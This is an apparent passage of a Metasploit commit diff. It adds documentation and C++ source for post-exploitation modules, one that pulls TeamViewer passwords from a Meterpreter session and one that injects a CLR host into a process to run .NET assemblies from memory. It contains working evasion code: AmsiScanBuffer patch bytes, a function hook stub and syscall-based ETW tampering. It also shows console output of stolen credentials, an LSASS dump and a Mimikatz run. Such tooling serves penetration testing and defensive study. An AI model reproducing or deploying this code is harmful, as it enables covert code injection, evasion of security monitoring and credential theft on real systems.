+[*] Local IP: http://192.168.1.136:8080/bvqUdtHUQ4De1O3
+[*] Invoking BloodHound with: Invoke-BloodHound -CollectionMethod Default -Threads 10 -JSONFolder "C:\Windows\TEMP" -PingTimeout 250 -LoopDelay 300 
+[*] Initializing BloodHound at 6:44 AM on 4/29/2019
+[*] Resolved Collection Methods to Group, LocalAdmin, Session, Trusts
+[*] Starting Enumeration for uplift.local
+[*] Status: 58 objects enumerated (+58 �/s --- Using 58 MB RAM )
+[*] Finished enumeration for uplift.local in 00:00:00.6365050
+[*] 0 hosts failed ping. 0 hosts timedout.
+[*] 
+[*] Compressing data to C:\Windows\TEMP\20190429064444_BloodHound.zip.
+[*] You can upload this file directly to the UI.
+[*] Finished compressing files!
+```

documentation/modules/post/windows/gather/credentials/teamviewer_passwords.md

@@ -2,17 +2,22 @@
 
   Any Windows host with a `meterpreter` session and TeamViewer 7+
   installed. The following passwords will be searched for and recovered:
-  
+
+  This module allows to enumerate window information to get the control ID
+  and Password of TeamViewer. 
+
   * Options Password -- All module-supported TeamViewer versions (7+)
   * Unattended Password -- TeamViewer versions 7 - 9
   * License Key -- TeamViewer versions 7 - 14
-  
+
 ### Installation Steps
 
   1. Download the latest installer of TeamViewer.
   2. Select "Custom Install With Unattended Password" during
+
     installation
   3. After installation, navigate to
+
     `Extra > Options > Security > Advanced > Show Advanced Settings` and
     set the "Options Password"
     * Options can also be exported to a .reg file from here.
@@ -22,10 +27,14 @@
   1. Get a `meterpreter` session on a Windows host.
   2. Do: ```run post/windows/gather/credentials/teamviewer_passwords```
   3. If the system has registry keys for TeamViewer passwords they will be printed out.
+    4. Print the control ID and password.
+    5.  If there is a email and password in the login box, the email and password will be printed.
 
 ## Options
 
-  None.
+ **WINDOW_TITLE**
+
+Specify a title for getting the window handle, e.g.:TeamViewer',Default is `TeamViewer`
 
 ## Scenarios
 
@@ -36,5 +45,17 @@ meterpreter > run post/windows/gather/credentials/teamviewer_passwords
 [+] Found Exported Unattended Password: P@$$w0rd
 [+] Found Options Password: op*****5
 [+] Passwords stored in: /home/blurbdust/.msf4/loot/20200207052401_default_***.***.***.***_host.teamviewer__588749.txt
-meterpreter > 
+[*] <---------------- | Using Window Technique | ---------------->
+[*] TeamViewer's language setting options are 'zhCN'
+[*] TeamViewer's version is '15.3.2682 '
+[+] TeamViewer's  title is 'TeamViewer'
+[*] Found handle to ID edit box 0x000502a8
+[*] Found handle to Password edit box 0x00050248
+[+] ID: 1 561 912 659
+[+] PASSWORD: AUdbM71f<_
+[*] Found handle to Email edit box 0x000501cc
+[*] Found handle to Password edit box 0x000501e2
+[+] EMAIL: kali-team@qq.com
+[+] PASSWORD: Mypassword.
+meterpreter >
 ```

documentation/modules/post/windows/manage/execute_dotnet_assembly.md

@@ -0,0 +1,254 @@
+# Execute .Net assembly via Meterpreter session
+
+This module executes a .NET Assembly from a Meterpreter session
+
+It spawns a process (or uses an existing process if provided a pid) and
+uses Reflective dll injection to load HostingCLRx64.dll needed to run
+.Net assembly. The unmanaged injected dll takes care of verifying if the
+process has already loaded the clr, and loads it if necessary. The
+version of the CLR to be loaded is determined by parsing of the assembly
+provided and searching for a known signature. Then it runs the assembly
+from memory.
+Before loading the assembly in the context of the clr, Amsi is bypassed
+using the AmsiScanBuffer patching technique.
+(https://rastamouse.me/2018/10/amsiscanbuffer-bypass-part-1/)
+
+You'll find details at [Execute assembly via Meterpreter session](https://b4rtik.blogspot.com/2018/12/execute-assembly-via-meterpreter-session.html)
+
+## Verification Steps
+
+  Example 1 no PID specified:
+
+  1. Start Clone from github SeatBelt or other .Net progect
+  2. Buid project with target framework 4.x or 3.5
+  2. Start msfconsole
+  4. Do: ```use post/windows/manage/execute_dotnet_assembly```
+  5. Do: ```set SESSION sessionid```
+  6. Do: ```set DOTNET_EXE /your/output/folder/file.exe```
+  7. Do: ```set ARGUMENTS user```
+  8. Do: ```run```
+  9. You should get something like that follow
+
+```
+msf5 post(windows/manage/execute_dotnet_assembly) > run
+
+[*] Launching notepad.exe to host CLR...
+[+] Process 10628 launched.
+[*] Reflectively injecting the Host DLL into 10628..
+[*] Injecting Host into 10628...
+[*] Host injected. Copy assembly into 10628...
+[*] Assembly copied.
+[*] Executing...
+[*] Start reading output
+[+] 
+[+] 
+[+]                         %&&@@@&&                                                                                  
+[+]                         &&&&&&&%%%,                       #&&@@@@@@%%%%%%###############%                         
+[+]                         &%&   %&%%                        &////(((&%%%%%#%################//((((###%%%%%%%%%%%%%%%
+[+] %%%%%%%%%%%######%%%#%%####%  &%%**#                      @////(((&%%%%%%######################(((((((((((((((((((
+[+] #%#%%%%%%%#######%#%%#######  %&%,,,,,,,,,,,,,,,,         @////(((&%%%%%#%#####################(((((((((((((((((((
+[+] #%#%%%%%%#####%%#%#%%#######  %%%,,,,,,  ,,.   ,,         @////(((&%%%%%%%######################(#(((#(#((((((((((
+[+] #####%%%####################  &%%......  ...   ..         @////(((&%%%%%%%###############%######((#(#(####((((((((
+[+] #######%##########%#########  %%%......  ...   ..         @////(((&%%%%%#########################(#(#######((#####
+[+] ###%##%%####################  &%%...............          @////(((&%%%%%%%%##############%#######(#########((#####
+[+] #####%######################  %%%..                       @////(((&%%%%%%%################                        
+[+]                         &%&   %%%%%      Seatbelt         %////(((&%%%%%%%%#############*                         
+[+]                         &%%&&&%%%%%        v0.2.0         ,(((&%%%%%%%%%%%%%%%%%,                                 
+[+]                          #%%%%##,                                                                                 
+.........
+.........
+.........
+[+]   [*] Use the Mimikatz "dpapi::cred" module with appropriate /masterkey to decrypt
+[+] 
+[+] 
+[+] === Checking for RDCMan Settings Files (Current User) ===
+[+] 
+[+] 
+[+] 
+[+] [*] Completed Safety Checks in 11 seconds
+[+] 
+[*] End output.
+[+] Killing process 10628
+[+] Execution finished.
+[*] Post module execution completed
+msf5 post(windows/manage/execute_dotnet_assembly) >
+```
+
+  Example 2 PID specified:
+
+  1. Start Clone from github SeatBelt or other .Net progect
+  2. Buid project with target framework 4.x or 3.5
+  2. Start msfconsole
+  4. Do: ```use post/windows/manage/execute_dotnet_assembly```
+  5. Do: ```set SESSION sessionid```
+  6. Do: ```set PID 8648```
+  7. Do: ```set ASSEMBLYPATH /your/output/folder/SeatBelt.exe```
+  8. Do: ```set ARGUMENTS user```
+  9. Do: ```run```
+  10. You should get something like that follow
+
+```
+msf5 post(windows/manage/execute_dotnet_assembly) > run
+
+[*] Warning: output unavailable
+[*] Hooking 8648 to host CLR...
+[+] Process 8648 hooked.
+[*] Reflectively injecting the Host DLL into 8648..
+[*] Injecting Host into 8648...
+[*] Host injected. Copy assembly into 8648...
+[*] Assembly copied.
+[*] Executing...
+[+] Execution finished.
+[*] Post module execution completed
+msf5 post(windows/manage/execute_dotnet_assembly) >
+```
+
+  Example 3 perform the functionality test of the Amsi bypass.
+  To perform the test it is necessary to use an assembly that runs 
+  Assembly.Load to load an assembly that we know to be detected. 
+  In the following example we use SafetyKatz which dynamically 
+  loads Mimikatz via Assmbly.Load
+  
+  1. Start Clone from github SafetyKatz or other .Net progect
+  2. Buid project with target framework 4.x
+  2. Start msfconsole
+  4. Do: ```use post/windows/manage/execute_dotnet_assembly```
+  5. Do: ```set SESSION sessionid```
+  6. Do: ```set PID 8648```
+  7. Do: ```set DOTNET_EXE /your/output/folder/SafetyKatz.exe```
+  8. Do: ```set ARGUMENTS user```
+  9. Do: ```set PROCESS nslookup.exe```
+  10. Do: ```set AMSIBYPASS false```
+  11. Do: ```run```
+  12. You should get something like that follow
+
+```
+msf5 post(windows/manage/execute_dotnet_assembly) > run
+
+[*] Launching nslookup.exe to host CLR...
+[+] Process 19904 launched.
+[*] Reflectively injecting the Host DLL into 19904..
+[*] Injecting Host into 19904...
+[*] Host injected. Copy assembly into 19904...
+[*] Assembly copied.
+[*] Executing...
+[*] Start reading output
+[+] Server predefinito:  
+[+] Address:  192.168.1.1
+[+] 
+[+] > 
+[*] End output.
+[+] Killing process 19904
+[+] Execution finished.
+[*] Post module execution completed
+msf5 post(windows/manage/execute_dotnet_assembly) >
+```
+
+Than
+
+  1. Do: ```set AMSIBYPASS true```
+  2. Do: ```run```
+  
+```
+msf5 post(windows/manage/execute_dotnet_assembly) > set amsibypass true
+amsibypass => true
+msf5 post(windows/manage/execute_dotnet_assembly) > run
+
+[*] Launching nslookup.exe to host CLR...
+[+] Process 19568 launched.
+[*] Reflectively injecting the Host DLL into 19568..
+[*] Injecting Host into 19568...
+[*] Host injected. Copy assembly into 19568...
+[*] Assembly copied.
+[*] Executing...
+[*] Start reading output
+[+] Server predefinito:  
+[+] Address:  192.168.1.1
+[+] 
+[+] > 
+[+] [*] Dumping lsass (744) to C:\WINDOWS\Temp\debug.bin
+[+] [+] Dump successful!
+[+] 
+[+] [*] Executing loaded Mimikatz PE
+[+] 
+[+]   .#####.   mimikatz 2.1.1 (x64) built on Jul  7 2018 03:36:26 - lil!
+[+]  .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
+[+]  ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
+[+]  ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
+[+]  '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
+[+]   '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/
+[+] 
+[+] mimikatz # Opening : 'C:\Windows\Temp\debug.bin' file for minidump...
+[+] ERROR kuhl_m_sekurlsa_acquireLSA ; Logon list
+[+] Opening : 'C:\Windows\Temp\debug.bin' file for minidump...
+[+] ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000002)
+[+] 
+[+] mimikatz # deleting C:\Windows\Temp\debug.bin
+[+] Execution started
+[+] ICorRuntimeHost->GetDefaultDomain(...) succeeded
+[*] End output.
+[+] Killing process 19568
+[+] Execution finished.
+[*] Post module execution completed
+msf5 post(windows/manage/execute_dotnet_assembly) >
+```
+
+## Options
+
+```
+Module options (post/windows/manage/execute_dotnet_assembly):
+
+   Name            Current Setting  Required  Description
+   ----            ---------------  --------  -----------
+   AMSIBYPASS      true             yes       Enable Amsi bypass
+   ARGUMENTS                        no        Command line arguments
+   DOTNET_EXE                       yes       Assembly file name
+   ETWBYPASS       true             yes       Enable Etw bypass
+   PID             0                no        Pid  to inject
+   PPID            0                no        Process Identifier for PPID spoofing when creating a new process. (0 = no PPID spoofing)
+   PROCESS         notepad.exe      no        Process to spawn
+   SESSION                          yes       The session to run this module on.
+   USETHREADTOKEN  true             no        Spawn process with thread impersonation
+   WAIT            10               no        Time in seconds to wait
+
+
+```
+
+AMSIBYPASS
+
+Enable or Disable Amsi bypass. This parameter is necessary due to the
+technique used. It is possible that subsequent updates will make the
+bypass unstable which could result in a crash. By setting the parameter
+to false the module continues to work.
+
+ARGUMENTS
+
+Command line arguments. The signature of the Main method must match with
+the parameters that have been set in the module, for example:
+
+If the property ARGUMENTS is set to "antani sblinda destra" the main
+method should be "static void main (string [] args)"<br />
+If the property ARGUMENTS is set to "" the main method should be "static
+void main ()"
+
+DOTNET_EXE 
+
+Dotnet Executable to execute
+
+PID
+
+Pid to inject. If different from 0 the module does not create a new
+process but uses the existing process identified by the PID parameter.
+
+PROCESS
+
+Process to spawn when PID is equal to 0.
+
+SESSION
+
+The session to run this module on. Must be meterpreter session
+
+WAIT
+
+Time in seconds to wait before starting to read the output.
+

external/source/HostingCLR_inject/HostingCLR.sln

@@ -0,0 +1,31 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio 15
+VisualStudioVersion = 15.0.28010.2050
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "HostingCLR", "HostingCLR\HostingCLR.vcxproj", "{C5ADDA72-8591-417A-BCE3-279EC6960FE2}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Win32 = Debug|Win32
+		Debug|x64 = Debug|x64
+		Release|Win32 = Release|Win32
+		Release|x64 = Release|x64
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{C5ADDA72-8591-417A-BCE3-279EC6960FE2}.Debug|Win32.ActiveCfg = Debug|Win32
+		{C5ADDA72-8591-417A-BCE3-279EC6960FE2}.Debug|Win32.Build.0 = Debug|Win32
+		{C5ADDA72-8591-417A-BCE3-279EC6960FE2}.Debug|x64.ActiveCfg = Debug|x64
+		{C5ADDA72-8591-417A-BCE3-279EC6960FE2}.Debug|x64.Build.0 = Debug|x64
+		{C5ADDA72-8591-417A-BCE3-279EC6960FE2}.Release|Win32.ActiveCfg = Release|Win32
+		{C5ADDA72-8591-417A-BCE3-279EC6960FE2}.Release|Win32.Build.0 = Release|Win32
+		{C5ADDA72-8591-417A-BCE3-279EC6960FE2}.Release|x64.ActiveCfg = Release|x64
+		{C5ADDA72-8591-417A-BCE3-279EC6960FE2}.Release|x64.Build.0 = Release|x64
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+	GlobalSection(ExtensibilityGlobals) = postSolution
+		SolutionGuid = {0DB82037-EA50-4013-84D9-44DD37ADA084}
+	EndGlobalSection
+EndGlobal

external/source/HostingCLR_inject/HostingCLR/EtwTamper.h

@@ -0,0 +1,239 @@
+#pragma once
+
+#include <Windows.h>
+
+#define STATUS_SUCCESS 0
+#define NtCurrentProcess() ( (HANDLE)(LONG_PTR) -1 )
+
+typedef struct _UNICODE_STRING {
+	USHORT Length;
+	USHORT MaximumLength;
+	PWSTR  Buffer;
+} UNICODE_STRING, *PUNICODE_STRING;
+
+typedef const UNICODE_STRING* PCUNICODE_STRING;
+
+typedef struct _PEB_LDR_DATA {
+	ULONG Length;
+	BOOLEAN Initialized;
+	HANDLE SsHandle;
+	LIST_ENTRY InLoadOrderModuleList;
+	LIST_ENTRY InMemoryOrderModuleList;
+	LIST_ENTRY InInitializationOrderModuleList;
+	PVOID EntryInProgress;
+	BOOLEAN ShutdownInProgress;
+	HANDLE ShutdownThreadId;
+} PEB_LDR_DATA, *PPEB_LDR_DATA;
+
+typedef struct _RTL_USER_PROCESS_PARAMETERS {
+	BYTE           Reserved1[16];
+	PVOID          Reserved2[10];
+	UNICODE_STRING ImagePathName;
+	UNICODE_STRING CommandLine;
+} RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS;
+
+typedef struct _API_SET_NAMESPACE {
+	ULONG Version;
+	ULONG Size;
+	ULONG Flags;
+	ULONG Count;
+	ULONG EntryOffset;
+	ULONG HashOffset;
+	ULONG HashFactor;
+} API_SET_NAMESPACE, *PAPI_SET_NAMESPACE;
+
+// Partial PEB
+typedef struct _PEB {
+	BOOLEAN InheritedAddressSpace;
+	BOOLEAN ReadImageFileExecOptions;
+	BOOLEAN BeingDebugged;
+	union
+	{
+		BOOLEAN BitField;
+		struct
+		{
+			BOOLEAN ImageUsesLargePages : 1;
+			BOOLEAN IsProtectedProcess : 1;
+			BOOLEAN IsLegacyProcess : 1;
+			BOOLEAN IsImageDynamicallyRelocated : 1;
+			BOOLEAN SkipPatchingUser32Forwarders : 1;
+			BOOLEAN SpareBits : 3;
+		};
+	};
+	HANDLE Mutant;
+
+	PVOID ImageBaseAddress;
+	PPEB_LDR_DATA Ldr;
+	PRTL_USER_PROCESS_PARAMETERS ProcessParameters;
+	PVOID SubSystemData;
+	PVOID ProcessHeap;
+	PRTL_CRITICAL_SECTION FastPebLock;
+	PVOID IFEOKey;
+	PSLIST_HEADER AtlThunkSListPtr;
+	union
+	{
+		ULONG CrossProcessFlags;
+		struct
+		{
+			ULONG ProcessInJob : 1;
+			ULONG ProcessInitializing : 1;
+			ULONG ProcessUsingVEH : 1;
+			ULONG ProcessUsingVCH : 1;
+			ULONG ProcessUsingFTH : 1;
+			ULONG ProcessPreviouslyThrottled : 1;
+			ULONG ProcessCurrentlyThrottled : 1;
+			ULONG ProcessImagesHotPatched : 1;
+			ULONG ReservedBits0 : 24;
+		};
+	};
+	union
+	{
+		PVOID KernelCallbackTable;
+		PVOID UserSharedInfoPtr;
+	};
+	ULONG SystemReserved;
+	ULONG AtlThunkSListPtr32;
+	PAPI_SET_NAMESPACE ApiSetMap;
+	ULONG TlsExpansionCounter;
+	PVOID TlsBitmap;
+	ULONG TlsBitmapBits[2];
+	PVOID ReadOnlySharedMemoryBase;
+	PVOID SharedData;
+	PVOID *ReadOnlyStaticServerData;
+	PVOID AnsiCodePageData;
+	PVOID OemCodePageData;
+	PVOID UnicodeCaseTableData;
+	ULONG NumberOfProcessors;
+	ULONG NtGlobalFlag;
+	ULARGE_INTEGER CriticalSectionTimeout;
+	SIZE_T HeapSegmentReserve;
+	SIZE_T HeapSegmentCommit;
+	SIZE_T HeapDeCommitTotalFreeThreshold;
+	SIZE_T HeapDeCommitFreeBlockThreshold;
+	ULONG NumberOfHeaps;
+	ULONG MaximumNumberOfHeaps;
+	PVOID *ProcessHeaps;
+	PVOID GdiSharedHandleTable;
+	PVOID ProcessStarterHelper;
+	ULONG GdiDCAttributeList;
+	PRTL_CRITICAL_SECTION LoaderLock;
+	ULONG OSMajorVersion;
+	ULONG OSMinorVersion;
+	USHORT OSBuildNumber;
+} PEB, *PPEB;
+
+typedef struct _LDR_DATA_TABLE_ENTRY {
+	LIST_ENTRY InLoadOrderLinks;
+	LIST_ENTRY InMemoryOrderLinks;
+	union
+	{
+		LIST_ENTRY InInitializationOrderLinks;
+		LIST_ENTRY InProgressLinks;
+	};
+	PVOID DllBase;
+	PVOID EntryPoint;
+	ULONG SizeOfImage;
+	UNICODE_STRING FullDllName;
+	UNICODE_STRING BaseDllName;
+	ULONG Flags;
+	WORD LoadCount;
+	WORD TlsIndex;
+	union
+	{
+		LIST_ENTRY HashLinks;
+		struct
+		{
+			PVOID SectionPointer;
+			ULONG CheckSum;
+		};
+	};
+	union
+	{
+		ULONG TimeDateStamp;
+		PVOID LoadedImports;
+	};
+} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
+
+typedef struct _TEB {
+	PVOID Reserved1[12];
+	PPEB  ProcessEnvironmentBlock;
+	PVOID Reserved2[399];
+	BYTE  Reserved3[1952];
+	PVOID TlsSlots[64];
+	BYTE  Reserved4[8];
+	PVOID Reserved5[26];
+	PVOID ReservedForOle;
+	PVOID Reserved6[4];
+	PVOID TlsExpansionSlots;
+} TEB, *PTEB;
+
+typedef ULONG(NTAPI *_EtwEventWrite)(
+	__in REGHANDLE RegHandle,
+	__in PCEVENT_DESCRIPTOR EventDescriptor,
+	__in ULONG UserDataCount,
+	__in_ecount_opt(UserDataCount) PEVENT_DATA_DESCRIPTOR UserData
+	);
+
+typedef ULONG(NTAPI *_EtwEventWriteFull)(
+	__in REGHANDLE RegHandle,
+	__in PCEVENT_DESCRIPTOR EventDescriptor,
+	__in USHORT EventProperty,
+	__in_opt LPCGUID ActivityId,
+	__in_opt LPCGUID RelatedActivityId,
+	__in ULONG UserDataCount,
+	__in_ecount_opt(UserDataCount) PEVENT_DATA_DESCRIPTOR UserData
+	);
+
+// Windows 7 SP1 / Server 2008 R2 specific Syscalls
+EXTERN_C NTSTATUS ZwProtectVirtualMemory7SP1(IN HANDLE ProcessHandle, IN PVOID* BaseAddress, IN SIZE_T* NumberOfBytesToProtect, IN ULONG NewAccessProtection, OUT PULONG OldAccessProtection);
+EXTERN_C NTSTATUS ZwReadVirtualMemory7SP1(HANDLE hProcess, PVOID lpBaseAddress, PVOID lpBuffer, SIZE_T NumberOfBytesToRead, PSIZE_T NumberOfBytesRead);
+EXTERN_C NTSTATUS ZwWriteVirtualMemory7SP1(HANDLE hProcess, PVOID lpBaseAddress, PVOID lpBuffer, SIZE_T NumberOfBytesToWrite, PSIZE_T NumberOfBytesWritten);
+
+// Windows 8 / Server 2012 specific Syscalls
+EXTERN_C NTSTATUS ZwProtectVirtualMemory80(IN HANDLE ProcessHandle, IN PVOID* BaseAddress, IN SIZE_T* NumberOfBytesToProtect, IN ULONG NewAccessProtection, OUT PULONG OldAccessProtection);
+EXTERN_C NTSTATUS ZwReadVirtualMemory80(HANDLE hProcess, PVOID lpBaseAddress, PVOID lpBuffer, SIZE_T NumberOfBytesToRead, PSIZE_T NumberOfBytesRead);
+EXTERN_C NTSTATUS ZwWriteVirtualMemory80(HANDLE hProcess, PVOID lpBaseAddress, PVOID lpBuffer, SIZE_T NumberOfBytesToWrite, PSIZE_T NumberOfBytesWritten);
+
+
+// Windows 8.1 / Server 2012 R2 specific Syscalls
+EXTERN_C NTSTATUS ZwProtectVirtualMemory81(IN HANDLE ProcessHandle, IN PVOID* BaseAddress, IN SIZE_T* NumberOfBytesToProtect, IN ULONG NewAccessProtection, OUT PULONG OldAccessProtection);
+EXTERN_C NTSTATUS ZwReadVirtualMemory81(HANDLE hProcess, PVOID lpBaseAddress, PVOID lpBuffer, SIZE_T NumberOfBytesToRead, PSIZE_T NumberOfBytesRead);
+EXTERN_C NTSTATUS ZwWriteVirtualMemory81(HANDLE hProcess, PVOID lpBaseAddress, PVOID lpBuffer, SIZE_T NumberOfBytesToWrite, PSIZE_T NumberOfBytesWritten);
+
+
+// Windows 10 / Server 2016 specific Syscalls
+EXTERN_C NTSTATUS ZwProtectVirtualMemory10(IN HANDLE ProcessHandle, IN PVOID* BaseAddress, IN SIZE_T* NumberOfBytesToProtect, IN ULONG NewAccessProtection, OUT PULONG OldAccessProtection);
+EXTERN_C NTSTATUS ZwReadVirtualMemory10(HANDLE hProcess, PVOID lpBaseAddress, PVOID lpBuffer, SIZE_T NumberOfBytesToRead, PSIZE_T NumberOfBytesRead);
+EXTERN_C NTSTATUS ZwWriteVirtualMemory10(HANDLE hProcess, PVOID lpBaseAddress, PVOID lpBuffer, SIZE_T NumberOfBytesToWrite, PSIZE_T NumberOfBytesWritten);
+
+NTSTATUS(*ZwProtectVirtualMemory)(
+	IN HANDLE ProcessHandle,
+	IN PVOID* BaseAddress,
+	IN SIZE_T* NumberOfBytesToProtect,
+	IN ULONG NewAccessProtection,
+	OUT PULONG OldAccessProtection
+	);
+
+NTSTATUS(*ZwReadVirtualMemory)(
+	HANDLE hProcess,
+	PVOID lpBaseAddress,
+	PVOID lpBuffer,
+	SIZE_T NumberOfBytesToRead,
+	PSIZE_T NumberOfBytesRead
+	);
+
+NTSTATUS(*ZwWriteVirtualMemory)(
+	HANDLE hProcess,
+	PVOID lpBaseAddress,
+	PVOID lpBuffer,
+	SIZE_T NumberOfBytesToWrite,
+	PSIZE_T NumberOfBytesWritten
+	);
+
+ULONG NTAPI MyEtwEventWrite(
+	__in REGHANDLE RegHandle,
+	__in PCEVENT_DESCRIPTOR EventDescriptor,
+	__in ULONG UserDataCount,
+	__in_ecount_opt(UserDataCount) PEVENT_DATA_DESCRIPTOR UserData);
+
+BOOL PatchEtw();

external/source/HostingCLR_inject/HostingCLR/Executer.cpp

@@ -0,0 +1,31 @@
+// Author: B4rtik (@b4rtik)
+// Project: Execute-dotnet-assembly (https://github.com/b4rtik/metasploit-execute-assembly)
+// License: BSD 3-Clause
+
+#include "stdafx.h"
+#include "ReflectiveLoader.h"
+#include "HostingCLR.h"
+
+extern HINSTANCE hAppInstance;
+
+BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
+{
+	BOOL bReturnValue = TRUE;
+	switch (dwReason)
+	{
+	case DLL_QUERY_HMODULE:
+		if (lpReserved != NULL)
+			*(HMODULE *)lpReserved = hAppInstance;
+		break;
+	case DLL_PROCESS_ATTACH:
+		hAppInstance = hinstDLL;
+		Execute(lpReserved);
+		fflush(stdout);
+		break;
+	case DLL_PROCESS_DETACH:
+	case DLL_THREAD_ATTACH:
+	case DLL_THREAD_DETACH:
+		break;
+	}
+	return bReturnValue;
+}

external/source/HostingCLR_inject/HostingCLR/HostingCLR.cpp

@@ -0,0 +1,514 @@
+// Author: B4rtik (@b4rtik)
+// Project: Execute Assembly (https://github.com/b4rtik/metasploit-execute-assembly)
+// License: BSD 3-Clause
+// based on 
+// https://github.com/etormadiv/HostingCLR
+// by Etor Madiv
+
+#include "stdafx.h"
+#include <stdio.h>
+#include <windows.h>
+#include <evntprov.h>
+#include "HostingCLR.h"
+#include "EtwTamper.h"
+
+// https://docs.microsoft.com/en-us/dotnet/framework/performance/etw-events-in-the-common-language-runtime
+#define ModuleLoad_V2 152
+#define AssemblyDCStart_V1 155
+#define MethodLoadVerbose_V1 143
+#define MethodJittingStarted 145
+#define ILStubGenerated 88
+
+unsigned char amsiflag[1];
+unsigned char etwflag[1];
+
+char sig_40[] = { 0x76,0x34,0x2E,0x30,0x2E,0x33,0x30,0x33,0x31,0x39 };
+char sig_20[] = { 0x76,0x32,0x2E,0x30,0x2E,0x35,0x30,0x37,0x32,0x37 };
+
+// mov rax, <Hooked function address>  
+// jmp rax
+unsigned char uHook[] = {
+	0x48, 0xb8, 0x00,0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+	0xFF, 0xE0
+};
+
+#ifdef _X32
+unsigned char amsipatch[] = { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00 };
+SIZE_T patchsize = 8;
+#endif
+#ifdef _X64
+unsigned char amsipatch[] = { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
+SIZE_T patchsize = 6;
+#endif
+
+union PARAMSIZE {
+	unsigned char myByte[4];
+	int intvalue;
+} paramsize;
+
+int executeSharp(LPVOID lpPayload)
+{
+	HRESULT hr;
+
+	ICLRMetaHost* pMetaHost = NULL;
+	ICLRRuntimeInfo* pRuntimeInfo = NULL;
+	BOOL bLoadable;
+	ICorRuntimeHost* pRuntimeHost = NULL;
+	IUnknownPtr pAppDomainThunk = NULL;
+	_AppDomainPtr pDefaultAppDomain = NULL;
+	_AssemblyPtr pAssembly = NULL;
+	SAFEARRAYBOUND rgsabound[1];
+	SIZE_T readed;
+	_MethodInfoPtr pMethodInfo = NULL;
+	VARIANT retVal;
+	VARIANT obj;
+	SAFEARRAY *psaStaticMethodArgs;
+	VARIANT vtPsa;
+
+	unsigned char pSize[8];
+
+	//Read parameters assemblysize + argssize
+	ReadProcessMemory(GetCurrentProcess(), lpPayload, pSize, 8, &readed);
+
+	PARAMSIZE assemblysize;
+	assemblysize.myByte[0] = pSize[0];
+	assemblysize.myByte[1] = pSize[1];
+	assemblysize.myByte[2] = pSize[2];
+	assemblysize.myByte[3] = pSize[3];
+
+	PARAMSIZE argssize;
+	argssize.myByte[0] = pSize[4];
+	argssize.myByte[1] = pSize[5];
+	argssize.myByte[2] = pSize[6];
+	argssize.myByte[3] = pSize[7];
+
+	long raw_assembly_length = assemblysize.intvalue;
+	long raw_args_length = argssize.intvalue;
+
+	unsigned char *allData = (unsigned char*)malloc(raw_assembly_length * sizeof(unsigned char)+ raw_args_length * sizeof(unsigned char) + 9 * sizeof(unsigned char));
+	unsigned char *arg_s = (unsigned char*)malloc(raw_args_length * sizeof(unsigned char));
+	unsigned char *rawData = (unsigned char*)malloc(raw_assembly_length * sizeof(unsigned char));
+
+	SecureZeroMemory(allData, raw_assembly_length * sizeof(unsigned char) + raw_args_length * sizeof(unsigned char) + 9 * sizeof(unsigned char));
+	SecureZeroMemory(arg_s, raw_args_length * sizeof(unsigned char));
+	SecureZeroMemory(rawData, raw_assembly_length * sizeof(unsigned char));
+
+	rgsabound[0].cElements = raw_assembly_length;
+	rgsabound[0].lLbound = 0;
+	SAFEARRAY* pSafeArray = SafeArrayCreate(VT_UI1, 1, rgsabound);
+
+	void* pvData = NULL;
+	hr = SafeArrayAccessData(pSafeArray, &pvData);
+
+	if (FAILED(hr))
+	{
+		printf("Failed SafeArrayAccessData w/hr 0x%08lx\n", hr);
+		return -1;
+	}
+	
+	//Reading memory parameters + amsiflag + args + assembly
+	ReadProcessMemory(GetCurrentProcess(), lpPayload , allData, raw_assembly_length + raw_args_length + 9, &readed);
+
+	//Taking pointer to amsi
+	unsigned char *offsetamsi = allData + 8;
+	//Store amsi flag 
+	memcpy(amsiflag, offsetamsi, 1);
+
+	unsigned char *offsetetw = allData + 9;
+	//Store amsi flag 
+	memcpy(etwflag, offsetetw, 1);
+	
+	//Taking pointer to args
+	unsigned char *offsetargs = allData + 10;
+	//Store parameters 
+	memcpy(arg_s, offsetargs, raw_args_length);
+
+	//Taking pointer to assembly
+	unsigned char *offset = allData + raw_args_length + 10;
+	//Store assembly
+	memcpy(pvData, offset, raw_assembly_length);
+
+	LPCWSTR clrVersion;
+	
+	if(FindVersion(pvData, raw_assembly_length))
+	{
+		clrVersion = L"v4.0.30319";
+	}
+	else
+	{
+		clrVersion = L"v2.0.50727";
+	}
+
+	hr = SafeArrayUnaccessData(pSafeArray);
+
+	if (FAILED(hr))
+	{
+		printf("Failed SafeArrayUnaccessData w/hr 0x%08lx\n", hr);
+		return -1;
+	}
+
+	//Etw bypass
+	if (etwflag[0] == '\x01')
+	{
+		int ptcResult = PatchEtw();
+		if (ptcResult == -1)
+		{
+			wprintf(L"Etw bypass failed\n");
+			return -1;
+		}
+	}
+
+	hr = CLRCreateInstance(CLSID_CLRMetaHost, IID_ICLRMetaHost, (VOID**)&pMetaHost);
+
+	if(FAILED(hr))
+	{
+		printf("CLRCreateInstance failed w/hr 0x%08lx\n", hr);
+		return -1;
+	}
+
+	IEnumUnknown* pEnumerator;
+	HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, GetCurrentProcessId());
+	hr = pMetaHost->EnumerateLoadedRuntimes(hProcess, &pEnumerator);
+
+	if (FAILED(hr))
+	{
+		printf("Cannot enumerate loaded runtime w/hr 0x%08lx\n", hr);
+		return -1;
+	}
+	
